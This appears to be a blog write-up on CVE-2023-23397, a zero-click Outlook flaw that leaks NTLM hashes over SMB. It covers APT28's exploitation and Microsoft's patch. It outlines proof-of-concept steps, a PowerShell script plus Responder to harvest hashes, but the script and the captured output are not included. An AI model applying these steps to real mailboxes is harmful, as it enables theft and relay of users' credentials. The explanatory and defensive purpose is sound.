“CVE-2023–23397 is a critical EoP vulnerability in Microsoft Outlook that is triggered when an attacker sends a message with an extended MAPI property with a UNC path to an SMB (TCP 445) share on a threat actor-controlled server on an untrusted network. No user interaction is required. The threat actor is using a connection to the remote SMB server sends the user’s NTLM negotiation message, which the attacker can then relay for authentication against other systems that support NTLM authentication”(MSRC).
In simple terms, this vulnerability affects Microsoft Outlook for Windows, which is an email client software. The vulnerability can be exploited by a remote attacker to elevate their privileges and gain unauthorized access to sensitive information. The attacker can send a message with a specific type of property that contains a link to a server controlled by the attacker. When the user receives the message, the link is automatically accessed, which can enable the attacker to steal the user’s credentials and use them to access other systems that support NTLM authentication. This could potentially result in the compromise of other systems on the network. To mitigate this vulnerability, Microsoft has released a security update for Microsoft Outlook for Windows. It is strongly recommended that users update their software to ensure that they remain protected from this vulnerability.
Why It’s So Dangerous:
The malicious email requires no user interaction to conduct this attack. The email and the exploit itself trigger automatically upon landing in a user’s inbox. The loss of financial data, sensitive customer information, employee data, and more are realistic and potentially devastating consequences of such an attack.
Threat Actors:
APT28 (a.k.a STRONTIUM, Sednit, Sofacy, and Fancy Bear) has been linked to Russia’s military intelligence service, GRU, and exploited the CVE-2023–23397 vulnerability between April and December 2022.
Below is a Proof-of-Concept Script that explains how this vulnerability is exploited:
Steps:
Populate code into PowerShell, set destination email.
Open Responder. Responder is a python tool, capable of harvesting credentials through Man in the Middle (MiTM) attack within Windows networks.
Alert Pop-Up:
Hashes:
Mitigation:
“To address this vulnerability, you must install the Outlook security update, regardless of where your mail is hosted (e.g., Exchange Online, Exchange Server, some other platform) or your organization’s support for NTLM authentication. The Outlook update addresses the vulnerability by only using the path to play a sound when from a local, intranet or trusted network source” (MSRC).
References
Msrc. (n.d.). Microsoft. MSRC Blog | Microsoft Security Response Center. Retrieved March 24, 2023, from https://msrc.microsoft.com/blog/2023/03/microsoft-mitigates-outlook-elevation-of-privilege-vulnerability/
Admin. (2023, March 15). Exploiting CVE-2023–23397: Microsoft Outlook Elevation of privilege vulnerability. MDSec. Retrieved March 24, 2023, from https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/
ka7ana. (2023, March 16). CVE-2023–23397/CVE-2023–23397.PS1 at main · Ka7ana/CVE-2023–23397. GitHub. Retrieved March 24, 2023, from https://github.com/ka7ana/CVE-2023-23397/blob/main/CVE-2023-23397.ps1
